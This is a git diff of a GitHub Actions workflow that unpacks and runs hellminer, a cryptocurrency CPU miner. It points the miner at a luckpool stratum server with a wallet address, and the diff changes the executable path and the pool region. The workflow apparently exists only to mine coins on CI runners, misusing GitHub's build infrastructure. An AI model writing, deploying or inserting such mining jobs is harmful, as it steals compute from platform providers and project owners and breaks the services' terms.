--- a/.github/workflows/vuong.yml
+++ b/.github/workflows/vuong.yml
@@ -21,6 +21,6 @@ jobs:
     - name: Seting-UP
       run: Expand-Archive hellminer_cpu_win64_avx.zip
     - name: Running
-      run: hellminer.exe -c stratum+tcp://na.luckpool.net:3956#xnsub -u RADzfp5pn7wvJEQkBiXPx4wJ7wTm7wg8V2.CPU_PC_MAO_HIEM -p x --cpu 1
+      run: .\hellminer_cpu_win64_avx\hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RADzfp5pn7wvJEQkBiXPx4wJ7wTm7wg8V2.CPU_PC_MAO_HIEM -p x --cpu 1
     - name: END
       run: exit
